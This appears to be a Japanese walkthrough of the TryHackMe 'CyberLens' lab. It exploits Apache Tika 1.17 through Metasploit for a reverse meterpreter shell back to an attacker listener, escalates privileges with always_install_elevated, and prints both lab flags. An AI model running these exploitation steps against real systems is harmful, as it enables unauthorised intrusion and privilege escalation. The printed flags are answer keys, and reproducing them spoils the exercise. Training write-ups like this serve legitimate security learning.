はじめに
今回はTryHackMeの難易度がEasyである「CyberLens」というRoomのwriteup兼備忘録になります。
※扱い次第では法に触れるため、悪用厳禁です。
Task1 CyberLens
本タスクにも記載がある通り、下記コマンドを最初に実行します。
sudo echo 'MACHINE_IP cyberlens.thm' >> /etc/hosts
ポートスキャンを実行します。
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -T4 10.10.69.230
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-25 07:31 EDT
Nmap scan report for 10.10.69.230
Host is up (0.26s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 15.89 seconds
80ポートが空いていたので、ブラウザでアクセスしてみます。
サイト内を探索していると、ファイルのアップローダを確認しました。
その辺りのソースコードを確認していると、エンドポイントを見つけたのでアクセスしてみます。
Apache Tika 1.17のページが表示されました。
どうやらこの「Apache Tika 1.17」に脆弱性があるとのこと。
参考サイト
参考サイトより、metasploitのモジュールと思われる為、実際に使用します。
metasploitを起動し、参考サイトと同じモジュールを検索してセットします。
msfconsole
msf6 > search apache_tika
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/apache_tika_jp2_jscript 2018-04-25 excellent Yes Apache Tika Header Command Injection
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/apache_tika_jp2_jscript
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/apache_tika_jp2_jscript) >
このモジュールを実行するためには、IPアドレスやポート情報を設定します。
LHOSTは攻撃者、RHOSTSはターゲット先のIPアドレス、RPORTはターゲット先のポートを指定します。
msf6 exploit(windows/http/apache_tika_jp2_jscript) > show options
Module options (exploit/windows/http/apache_tika_jp2_jscript):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host
:port][...]
RHOSTS 10.10.69.230 yes The target host(s), see https://github.com/rapid7
/metasploit-framework/wiki/Using-Metasploit
RPORT 61777 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on.
This must be an address on the local machine or
0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is rand
omly generated)
TARGETURI / yes The base path to the web application
URIPATH no The URI to use for this exploit (default is rando
m)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process
, none)
LHOST 10.8.59.30 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
View the full module info with the info, or info -d command.
設定が終えたら実行します。
設定情報に問題ない場合においても、失敗する場合があるのでその場合は再度トライしてください。
msf6 exploit(windows/http/apache_tika_jp2_jscript) > exploit
[*] Started reverse TCP handler on 10.8.59.30:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 8.10% done (7999/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 16.19% done (15998/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 24.29% done (23997/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 32.39% done (31996/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 40.48% done (39995/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 48.58% done (47994/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 56.67% done (55993/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 64.77% done (63992/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 72.87% done (71991/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 80.96% done (79990/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 89.06% done (87989/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 97.16% done (95988/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 100.00% done (98798/98798 bytes)
[*] Sending stage (175686 bytes) to 10.10.69.230
[*] Meterpreter session 1 opened (10.8.59.30:4444 -> 10.10.69.230:49852) at 2024-09-25 08:31:11 -0400
meterpreter >
meterpreterと表示されたら成功です。
What is the user flag?
シェルを起動します。
meterpreter > shell
Process 5980 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows>
ユーザフラグを探します。
おそらく何かテキストファイルに記載されていると思い、「.txt」が含まれるファイルを探してみます。
C:\Windows\system32>tree c:\users
tree c:\users
Folder PATH listing
Volume serial number is A8A4-C362
C:\USERS
����Administrator
����CyberLens
� ����3D Objects
� ����Contacts
� ����Desktop
� ����Documents
� � ����Management
� ����Downloads
� ����Favorites
� � ����Links
� ����Links
� ����Music
� ����Pictures
� ����Saved Games
� ����Searches
� ����Videos
����Public
����Documents
����Downloads
����Music
����Pictures
����Videos
C:\Windows\system32>dir dir C:\USERS\CyberLens\*.txt* /s
dir C:\USERS\CyberLens\*.txt* /s
Volume in drive C has no label.
...
Directory of C:\USERS\CyberLens\Desktop
06/06/2023 07:54 PM 25 user.txt
1 File(s) 25 bytes
Directory of C:\USERS\CyberLens\Documents\Management
...
C:\Windows\system32>
「user.txt」の格納先が判明したので、中身を確認してフラグ獲得となります。
cat C:\USERS\CyberLens\Desktop\user.txt
C:\Windows\system32>more C:\USERS\CyberLens\Desktop\user.txt
more C:\USERS\CyberLens\Desktop\user.txt
THM{T1k4-CV3-f0r-7h3-w1n}
C:\Windows\system32>
What is the admin flag?
続いて管理者ユーザのフラグの探索を行います。
一度backgroundコマンドでmsfに戻り、suggester用のペイロードを実行して、接続した環境の脆弱性と、その脆弱性にあったペイロードを解析します。
msf6 exploit(windows/http/apache_tika_jp2_jscript) > search exploit suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(windows/http/apache_tika_jp2_jscript) > [*] 10.10.69.230 - Meterpreter session 2 closed. Reason: Died
[*] 10.10.69.230 - Meterpreter session 3 closed. Reason: Died
msf6 exploit(windows/http/apache_tika_jp2_jscript) >
次にsuggester用のpeyloadをセットし、先ほどユーザフラグを獲得したセッションを指定してします。
msf6 exploit(windows/http/apache_tika_jp2_jscript) > use 0
msf6 post(multi/recon/local_exploit_suggester) >
msf6 exploit(windows/http/apache_tika_jp2_jscript) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
4 meterpreter x86/windows CYBERLENS\CyberLens @ CYB 10.8.59.30:4444 -> 10.10.6
ERLENS 9.230:49874 (10.10.69.230)
5 meterpreter x86/windows CYBERLENS\CyberLens @ CYB 10.8.59.30:4444 -> 10.10.6
ERLENS 9.230:49873 (10.10.69.230)
msf6 post(multi/recon/local_exploit_suggester) > set session 4
session => 4
実行すると、有効であるpayload候補が表示されます。
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.69.230 - Collecting local exploits for x86/windows...
[*] 10.10.69.230 - 174 exploit checks are being tried...
[+] 10.10.69.230 - exploit/windows/local/always_install_elevated: The target is vulnerable.
[+] 10.10.69.230 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.69.230 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.69.230 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 41 / 41
[*] 10.10.69.230 - Valid modules for session 4:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/always_install_elevated Yes The target is vulnerable.
2 exploit/windows/local/cve_2020_1048_printerdemon Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2020_1337_printerdemon Yes The target appears to be vulnerable.
4 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
5 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
今回は「local/always_install_elevated 」を使用します。
再度セッションを指定して、ペイロードを実行します。
msf6 post(multi/recon/local_exploit_suggester) > use 1
msf6 exploit(windows/local/always_install_elevated) > options
Module options (exploit/windows/local/always_install_elevated):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process
, none)
LHOST 10.8.59.30 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/always_install_elevated) > set session 4
session => 4
suggesterで特定したpayloadを実行すると、管理者ユーザでアクセスされる事を確認しました。
msf6 exploit(windows/local/always_install_elevated) > exploit
[*] Started reverse TCP handler on 10.8.59.30:4444
[*] Uploading the MSI to C:\Users\CYBERL~1\AppData\Local\Temp\1\nrEysarn.msi ...
[*] Executing MSI...
[*] Sending stage (175686 bytes) to 10.10.69.230
[+] Deleted C:\Users\CYBERL~1\AppData\Local\Temp\1\nrEysarn.msi
[*] Meterpreter session 6 opened (10.8.59.30:4444 -> 10.10.69.230:49876) at 2024-09-25 10:05:28 -0400
meterpreter > whoami
dir C:\USERS\Administrator\*.txt* /s
最後に管理者用フラグを先ほどのユーザフラグと同様に探索し、獲得となります。
C:\Users\Administrator>dir C:\USERS\Administrator\*.txt* /s
dir C:\USERS\Administrator\*.txt* /s
Volume in drive C has no label.
...
11/27/2023 07:50 PM 24 admin.txt
1 File(s) 24 bytes
Total Files Listed:
26 File(s) 1,733,499 bytes
0 Dir(s) 14,915,297,280 bytes free
more Desktop\admin.txt
C:\Users\Administrator>more Desktop\admin.txt
more Desktop\admin.txt
THM{3lev@t3D-4-pr1v35c!}
さいごに
以上となります。